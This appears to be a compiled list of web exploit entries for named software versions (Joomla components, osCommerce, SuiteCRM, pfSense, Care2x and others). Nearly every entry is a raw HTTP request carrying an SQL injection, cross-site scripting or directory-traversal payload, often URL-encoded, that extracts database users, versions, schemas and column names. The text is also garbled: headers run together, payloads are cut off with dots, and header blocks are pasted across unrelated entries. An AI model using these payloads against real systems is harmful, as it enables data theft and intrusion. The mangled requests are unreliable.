cmId=%31%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c

%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2d%2d%20%2d: undefined

Target program: Joomla! Component
Target environment: Joomla! Component vReview 1.9.11

2019-01-23 46228 SQL Injection (difficulty: Low, risk: Low) Joomla! Component vRestaurant 1.9.4 - SQL Injection

POST /10.0.100.24/menu-listing-layout/menuitems HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 322
Cookie: 1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b3
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

csmodid=236&Itemid=303&keysearch=' union select(SELECT(@x)FROM(SELECT(@x: =0x00),(@NR

Target program: Joomla! Component
Target environment: Joomla! Component vRestaurant 1.9.4


2019-01-23 46229 SQL Injection (difficulty: Low, risk: Low) Joomla! Component VMap 1.9.6 - SQL Injection

GET /10.0.100.24/index.php?option=com_vmap&task=loadmarker&latlngbound=-40.716362432588596,40.71920853699145,-73.983044552948,-73.972959447052%20%4f%72%64%65%72%20%62%79%20%31%32%2d%2d%20%2d&mapid=1 HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: 1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b3; currentURI=http%3A%2F%2Flocalhost%2Fjomsocial-profile-layout%2F709-john-dev%2Ffriends%3Fq%3D%2527%26search%3Dfriends%26option%3Dcom_community%26view%3Dfriends%26Itemid%3D526

Target program: Joomla! Component
Target environment: Joomla! Component VMap 1.9.6

2019-01-23 46230 SQL Injection (difficulty: Low, risk: Low) Joomla! Component J-BusinessDirectory 4.9.7 - 'type' SQL Injection

GET /10.0.100.24/index.php?option=com_jbusinessdirectory&task=categories.getCategories&type=1%20union%20select%20(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),2--%20-&term=a HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: __cfduid=d35dbe4de0d461bf69a9165df0f9691951548240991; 79a1b3ae870a3fab009030106c9fb887=eeab77f1b87057d5ad12b61071048ad6; PHPSESSID=c1088ee33a3f4770dd333f9605b9e44f; 704a7cf3f453ec2db97de2f28ef169f8=fb9a121113ff0e6cc6da546a82f2452e
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Target program: Joomla! Component
Target environment: Joomla! Component J-BusinessDirectory 4.9.7

2019-01-23 46231 SQL Injection (difficulty: Medium, risk: Low) Joomla! Component J-ClassifiedsManager 3.0.5 - SQL Injection

POST /10.0.100.24/component/jclassifiedsmanager/ HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 779
Cookie: __cfduid=d35dbe4de0d461bf69a9165df0f9691951548240991; 79a1b3ae870a3fab009030106c9fb887=eeab77f1b87057d5ad12b61071048ad6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

searchKeyword=&categorySearch=&adType=&citySearch=1'%7c%7c%28%53%45%4c%45%43%54%20%27%45%66%65%27%20%46%52%4f%4d%20%44%55%41%4c%20%57%48%45%52%452%3d%32%20%41%4e%44%20%28%53%45%4c%45%43%54%20%32%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29,%56%45%52%53%49%4f%4e%....59%20%78%29%61%29%29%7c%7c%27&option=com_jclassifiedsmanager&controller=displayads&task=searchAds&view=displayads

Target program: Joomla! Component
Target environment: Joomla! Component J-ClassifiedsManager 3.0.5

2019-01-23 46232 SQL Injection (difficulty: Low, risk: Low) Joomla! Component JMultipleHotelReservation 6.0.7 - SQL Injection

POST /10.0.100.24/j-myhotel/search-hotels?view=hotels HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 985
Cookie: __cfduid=d35dbe4de0d461bf69a9165df0f9691951548240991; PHPSESSID=6c6c795380ae5a25888e1dd57e04320a; c9ffd68b334eb414c880fa254194ecbb=6053bfbb8394c9545ab2169c4399aefc
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

controller=search&task=searchHotels&year_start=2019&month_start=01&day_start=23&year_end=2019&month_end=01&hotel_id=&day_end=24&rooms=-1 UNION SELECT 1,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer

Target program: Joomla! Component
Target environment: Joomla! Component JMultipleHotelReservation 6.0.7

2019-01-24 46233 SQL Injection (difficulty: Medium, risk: Low) Joomla! Component J-CruisePortal 6.0.4 - SQL Injection

POST /10.0.100.24/cruises/cruises HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 518
Connection: keep-alive
Upgrade-Insecure-Requests: 1

controller=search&task=searchCruises&year_start=2019&month_start=01&day_start=23&year_end=2019&month_end=01&cruise_id=&day_end=24&rooms=1&guest_adult=2%20%20%2f%2a%21%31%31%31%31%31%61%6e%44%2a%2f%20%73%6c%65%65%70%28%35%29&guest_child=0&filterParams=&resetSearch=1&searchType=&searchId=&room-guests%5B%5D=2&room-guests-children%5B%5D=0&keyword=&jcruisereservation_datas=01%2F23%2F2019&jcruisereservation_datae=01%2F24%2F2019&jcruisereservation_rooms=1&jcruisereservation_guest_adult=2&jcruisereservation_guest_child=0

Target program: Joomla! Component
Target environment: Joomla! Component J-CruisePortal 6.0.4


2019-01-24 46234 SQL Injection (difficulty: Medium, risk: Medium) Joomla! Component JHotelReservation 6.0.7 - SQL Injection

POST /10.0.100.24/j-myhotel/search-hotels?view=hotels HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Alt-Used: TARGET:443
Connection: keep-alive
Content-Tye: application/x-www-form-urlencoded
Content-Length: 965

task=hotels.searchHotels&year_start=2019&month_start=01&day_start=23&year_end=2019&month_end=01&hotel_id=&day_end=24&rooms=1%20%2f%2a%21%31%31%31%31%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%31%31%3

1%31%31%53%45%4c%45%43%54%2a%2f%20%31%2c%76%65%72%73%69%6f%6e%28%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%

2c%31%32%2c%31%......33%32%2c%33%33%2c%33%34%2c%33%35%2c%33%36%2c%3

3%37%2c%33%38%2c%33%39%2c%34%30%2c%34%31%2c%34%32%2c%34%33%2c%34%34%2d%2d%20%2d&guest_adult=2&guest_child=0&filterParams=facilityId%3D1&resetSearch=0'&searchType=&searchId=&priceLow=&priceHigh=&room-guests%5B%5D=2&room-guests-children%5B%5D=0&keyword=Paris&jhotelreservation_datas=23-01-2019&jhotelreservation_datae=24-01-2019&jhotelreservation_rooms=1&jhotelreservation_guest_adult=2&jhotelreservation_guest_child=0

Target program: Joomla! Component
Target environment: Joomla! Component JHotelReservation 6.0.7

2019-01-24 46235 SQL Injection (difficulty: Low, risk: Medium) SimplePress CMS 1.0.7 - SQL Injection

GET/10.0.100.24/?p=%2d%31%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%32%29%2c%28%33%29,(%34%29%2c%28%35%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%37%29%2c%28%38%29%2c%28%39%29%2c%28%31%30%29%2c%28%31%31%29%2c%28%31%32%29%2c%28%31%33%29%29%2d%2d%20%2d HTTP/1.1

Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: NO_CACHE=1; CAKEPHP=72i3s18s3sk0mn2c63gi0pikq0; PHPSESSID=i9sb2qgkcblm5l47uv4d3h2vm1
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

Target program: SimplePress CMS
Target environment: SimplePress CMS 1.0.7

2019-01-24 46237 XSS (difficulty: Low, risk: Low) SirsiDynix e-Library 3.5.x - Cross-Site Scripting

POST /10.0.100.24/uhtbin/cgisirsi/?ps=0Sk8zSpD0f/MAIN/33660028/123 HTTP/1.1
Host: 10.0.100.24:1004
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target/uhtbin/cgisirsi/?ps=mmRoXTc0L3/MAIN/33660028/38/1/X/BLASTOFF
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 197

searchdata1=test&srchfield1=AU%5EAUTHOR%5EAUTHORS%5EAuthor+Processing%5EYazar&library=VLK&srch_history=--%C3%96nceki+soruyu+se%C3%A7--&sort_by=ANYhadvi%22%3e%3cscript%3ealert(1)%3c%2fscript%3eox0ix

Target program: SirsiDynix e-Library
Target environment: SirsiDynix e-Library 3.5.x

2019-01-24 46239 SQL Injection (difficulty: Low, risk: Low) ImpressCMS 1.3.11 - 'bid' SQL Injection

POST /10.0.100.24/impress/modules/system/admin.php?bid=12 HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

bid=12') AND SLEEP(5) AND('Bjhx'='Bjhx&fct=blocksadmin&op=up&rtn=Lw==

Target program: ImpressCMS
Target environment: ImpressCMS 1.3.11

2019-01-25 46244 SQL Injection (difficulty: Medium, risk: Medium) GreenCMS 2.x - SQL Injection

GET /10.0.100.24/index.php?m=admin&c=posts&a=index&cat=1%27))%20AND%201=BENCHMARK(100000000,MD5(0x456665))--%20- HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

Target program: GreenCMS
Target environment: GreenCMS 2.x

2019-01-28 46259 SQL Injection (difficulty: Low, risk: Low) CMSsite 1.0 - 'cat_id' SQL Injection

POST /10.0.100.24/cm/category.php HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 52

cat_id=7 UNION SELECT 1,2,user(),3,4,5,6,7,8,9,10%23

Target program: CMSsite
Target environment: CMSsite 1.0


2019-01-28 46266 SQL Injection (difficulty: Low, risk: Low) Newsbull Haber Script 1.0.0 - 'search' SQL Injection

POST /10.0.100.24/admin/comment/records? HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 64

userId=1&search=-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'

Target program: Newsbull Haber Script
Target environment: Newsbull Haber Script 1.0.0

2019-01-28 46268 SQL Injection (difficulty: Low, risk: Low) Care2x 2.7 (HIS) Hospital Information System - Multiple SQL Injection

GET /10.0.100.24/main/login.php?ntid=false&lang=en HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.108/main/indexframe.php?boot=1&mask=&lang=en&cookie=&sid=6fclqapl9gsjhrcgoh3q0la5sp
Connection: close
Cookie: sid=6fclqapl9gsjhrcgoh3q0la5sp; ck_sid6fclqapl9gsjhrcgoh3q0la5sp=m14AAA%3D%3D%23WVUYpUnF%2Fo28ZWY45A5Sh9HMvr%2FZ8wVabFY%3D; ck_config=CFG5c414492459f90.28518700%201547781266
Upgrade-Insecure-Requests: 1

Target program: Hospital Information System
Target environment: Care2x 2.7 (HIS) Hospital Information System

2019-01-28 46270 SQL Injection (difficulty: Low, risk: Low) Teameyo Project Management System 1.0 - SQL Injection

GET /10.0.100.24/messages.php?project_id=-48%27%20union%20select%20(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rU

NNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)--%20- HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brCookie: PHPSESSID=1ug6oq40f09kft3jqncc4pco71DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

Target program: Teameyo Project Management System
Target environment: Teameyo Project Management System 1.0

2019-01-28 46271 SQL Injection (difficulty: Low, risk: Low) Mess Management System 1.0 - SQL Injection

GET

/10.0.100.24/index.php?mod=admin&pg=admin_form&id=%2d%31%27%20%7

5%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%33%2d%2d%20%2d HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=6bpo344k5sbed3vd2lc6tlgh80DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

Target program: Mess Management System
Target environment: Mess Management System 1.0

2019-01-28 46273 XSS (difficulty: Low, risk: Low) MyBB IP History Logs Plugin 1.0.2 - Cross-Site Scripting

POST /10.0.100.24/admin/index.php?module=tools-ip_history_logs HTTP/1.1
Host: 10.0.100.24:1004
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target/uhtbin/cgisirsi/?ps=mmRoXTc0L3/MAIN/33660028/38/1/X/BLASTOFF
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 40

User-Agent=<script>alert('XSS')</script>

Target program: MyBB IP History Logs Plugin
Target environment: MyBB IP History Logs Plugin 1.0.2

2019-02-04 46316 XSS (difficulty: Low, risk: Low) pfSense 2.4.4-p1 - Cross-Site Scripting

POST /10.0.100.24/system_advanced_admin.php HTTP/1.1
Host: 10.0.100.24:1004
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target/uhtbin/cgisirsi/?ps=mmRoXTc0L3/MAIN/33660028/38/1/X/BLASTOFF
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 40

webguiproto="><script>alert(1)</script>

Target program: pfSense
Target environment: pfSense 2.4.4-p1

2019-02-04 46315 XSS (difficulty: Low, risk: Low) Nessus 8.2.1 - Cross-Site Scripting

POST /10.0.100.24/policies HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost:8834/
Content-Type: application/json
X-API-Token: 9A8BB6D6-2297-47EF-8083-D1EC639444B4
X-Cookie: token=7856d1d4dfdeb394d00a3993b6c3829df42ba6dbebbcac45
Content-Length: 3467
DNT: 1
Connection: close

value=\"><script>alert(1)</script>

Target program: Nessus
Target environment: Nessus 8.2.1

2019-02-04 46311 SQL Injection (difficulty: Low, risk: Low) SuiteCRM 7.10.7 - 'record' SQL Injection

GET /10.0.100.24/SuiteCRM/index.php?module=Users&action=DetailView&record=1aNd if(length(0x454d49524f474c55)>1,sleep(5),0) HTTP/1.1

Target program: SuiteCRM
Target environment: SuiteCRM 7.10.7


2019-02-04 46310 SQL Injection (difficulty: Low, risk: Low) SuiteCRM 7.10.7 - 'parentTab' SQL Injection

GET /10.0.100.24/SuiteCRM/index.php?module=Emails&action=index&parentTab=99999999%27)/**/oR/**/6617279=6617279/**/aNd/**/(%276199%27)=(%276199 HTTP/1.1

Target program: SuiteCRM
Target environment: SuiteCRM 7.10.7

2019-02-04 46308 SQL Injection (difficulty: Low, risk: Low) ResourceSpace 8.6 - 'watched_searches.php' SQL Injection

GET /10.0.100.24/plugins/rse_search_notifications/pages/watched_searches.php?offset=0&callback=checknow&ref=[SQL]&ajax=true&_=1548992497510 HTTP/1.1

Target program: ResourceSpace
Target environment: ResourceSpace 8.6

2019-02-06 46330 SQL Injection (difficulty: Low, risk: Low) osCommerce 2.3.4.1 - 'reviews_id' SQL Injection

GET /10.0.100.24/oscommerce/catalog/product_reviews_write.php?products_id=19&reviews_id=99999999/**/oR/**/7096077=7096077/**/aNd/**/7193=7193 HTTP/1.1

Target program: osCommerce
Target environment: osCommerce 2.3.4.1

2019-02-06 46329 SQL Injection (difficulty: Low, risk: Low) osCommerce 2.3.4.1 - 'products_id' SQL Injection

GET /10.0.100.24/oscommerce/catalog/product_info.php?products_id=99999999oR 1811160=1811160 aNd 7193=7193 HTTP/1.1

Target program: osCommerce
Target environment: osCommerce 2.3.4.1

2019-02-06 46328 SQL Injection (difficulty: Low, risk: Low) osCommerce 2.3.4.1 - 'currency' SQL Injection

GET /10.0.100.24/oscommerce/catalog/shopping_cart.php?currency=99999999%27oR 3620772=3620772 aNd %276199%27=%2761993 HTTP/1.1

Target program: osCommerce
Target environment: osCommerce 2.3.4.1

2019-02-11 46350 SQL Injection (difficulty: Medium, risk: Medium) Webiness Inventory 2.3 - 'email' SQL Injection

POST /10.0.100.24/webiness/index.php?request=Wsauth/login/ HTTP/1.1
Host: 10.0.100.24:1004
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 456
Content-Type: multipart/form-data; boundary=54a535315dda429db2f07895827ff1c6
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/54.0.2840.99 Safari/537.36

--54a535315dda429db2f07895827ff1c6
Content-Disposition: form-data; name="email"

-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))xFROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
--54a535315dda429db2f07895827ff1c6
Content-Disposition: form-data; name="password"

--54a535315dda429db2f07895827ff1c6--

Target program: Webiness Inventory 2.3; target environment: Webiness Inventory 2.3

2019-02-11 46349 XSS (difficulty: Low, risk: Low) CentOS Web Panel 0.9.8.763 - Persistent Cross-Site Scripting

POST /10.0.100.24/policies HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)Gecko/20100101 Firefox/64.0

Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://localhost:8834/Content-Type: application/jsonX-API-Token: 9A8BB6D6-2297-47EF-8083-D1EC639444B4X-Cookie: token=7856d1d4dfdeb394d00a3993b6c3829df42ba6dbebbcac45Content-Length: 3467DNT: 1Connection: close

Package Name=<script>alert(1)</script>

Target program: CentOS Web Panel; target environment: CentOS Web Panel 0.9.8.763

2019-02-11 46344 XSS (difficulty: Medium, risk: Low) IPFire 2.21 - Cross-Site Scripting

POST /10.0.100.24/cgi-bin/mail.cgi HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)Gecko/20100101 Firefox/64.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate

Referer: https://localhost:8834/Content-Type: application/jsonX-API-Token: 9A8BB6D6-2297-47EF-8083-D1EC639444B4X-Cookie: token=7856d1d4dfdeb394d00a3993b6c3829df42ba6dbebbcac45Content-Length: 3467DNT: 1Connection: close

txt_mailsender='"><script>alert(1)</script>txt_recipient='><script>alert(2)</script>txt_mailserver='><script>alert(3)</script>txt_mailport='><script>alert(4)</script>txt_mailuser='><script>alert(5)</script>txt_mailpass='><script>alert(6)</script>PROXY_PORT='><script>alert(7)</script>TRANSPARENT_PORT='><script>alert(8)</script>

UPSTREAM_PROXY='><script>alert(9)</script>UPSTREAM_USER='><script>alert(10)</script>UPSTREAM_PASSWORD='><script>alert(11)</script>FILEDESCRIPTORS='><script>alert(12)</script>CACHE_MEM='><script>alert(13)</script>

CACHE_SIZE='><script>alert(14)</script>

Target program: IPFire; target environment: IPFire 2.21

2019-02-11 46333 XSS (difficulty: Low, risk: Low) Smoothwall Express 3.1-SP4 - Cross-Site Scripting

POST /10.0.100.24/cgi-bin/proxy.cgi? HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)Gecko/20100101 Firefox/64.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://localhost:8834/Content-Type: application/jsonX-API-Token: 9A8BB6D6-2297-47EF-8083-D1EC639444B4X-Cookie: token=7856d1d4dfdeb394d00a3993b6c3829df42ba6dbebbcac45Content-Length: 3467DNT: 1Connection: close

CACHE_SIZE='><script>alert(1)</script>MAX_SIZE='><script>alert(2)</script>MIN_SIZE='><script>alert(3)</script>

MAX_OUTGOING_SIZE='><script>alert(4)</script>

MAX_INCOMING_SIZE='><script>alert(5)</script>REDIRECT_PAGE='><script>alert(6)</script>

Target program: Smoothwall Express; target environment: Smoothwall Express 3.1-SP4


2019-02-12 46353 Directory Traversal (difficulty: Low, risk: Low) BlogEngine.NET 3.3.6 - Directory Traversal

GET /?theme=../../App_Data/files HTTP/1.1

Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:

text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

Target program: BlogEngine.NET; target environment: BlogEngine.NET 3.3.6

2019-02-12 46351 XSS (difficulty: Low, risk: Low) OPNsense < 19.1.1 - Cross-Site Scripting

POST /10.0.100.24/diag_backup.php HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)Gecko/20100101 Firefox/64.0Accept: */*

Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://localhost:8834/Content-Type: application/jsonX-API-Token: 9A8BB6D6-2297-47EF-8083-D1EC639444B4X-Cookie: token=7856d1d4dfdeb394d00a3993b6c3829df42ba6dbebbcac45Content-Length: 3467DNT: 1Connection: close

GDrive_GDriveEmail="><script>alert(1)</script>GDrive_GDriveFolderID="><script>alert(2)</script>GDrive_GDriveBackupCount="><script>alert(3)</script>Nextcloud_url="><script>alert(4)</script>Nextcloud_user="><script>alert(5)</script>Nextcloud_password="><script>alert(6)</script>Nextcloud_password_encryption="><script>alert(7)</script>

Target program: OPNsense; target environment: OPNsense < 19.1.1

2019-02-13 46368 SQL Injection (difficulty: Low, risk: Medium) PilusCart 1.4.1 - 'send' SQL Injection

POST /10.0.100.24/PiLUS/read-apa-itu-pdo?post_id=3&post_slug=apa-itu-pdo&nama_komentar=4866630&situs_web=9391510&captcha=4551404&toke

n=473ec0c6bda264fefb8447c8ff01956248ea477c&isi_komentar=EMIROGLU2823174&send=Kirim HTTP/1.1Host: 10.0.100.24:1004Accept:

text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5

Cache-Control: no-cacheContent-Length: 456Content-Type: multipart/form-data;boundary=54a535315dda429db2f07895827ff1c6User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64)

AppleWebKit/537.36 (KHTML,like Gecko) Chrome/54.0.2840.99 Safari/537.36

--54a535315dda429db2f07895827ff1c6

Content-Disposition: form-data; name="email"-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECTCOUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CH

AR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))xFROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'--54a535315dda429db2f07895827ff1c6Content-Disposition: form-data; name="password"--54a535315dda429db2f07895827ff1c6--

Target program: PilusCart; target environment: PilusCart 1.4.1

2019-02-13 46366 XSS (difficulty: Low, risk: Low) Rukovoditel Project Management CRM 2.4.1 - Cross-Site Scripting

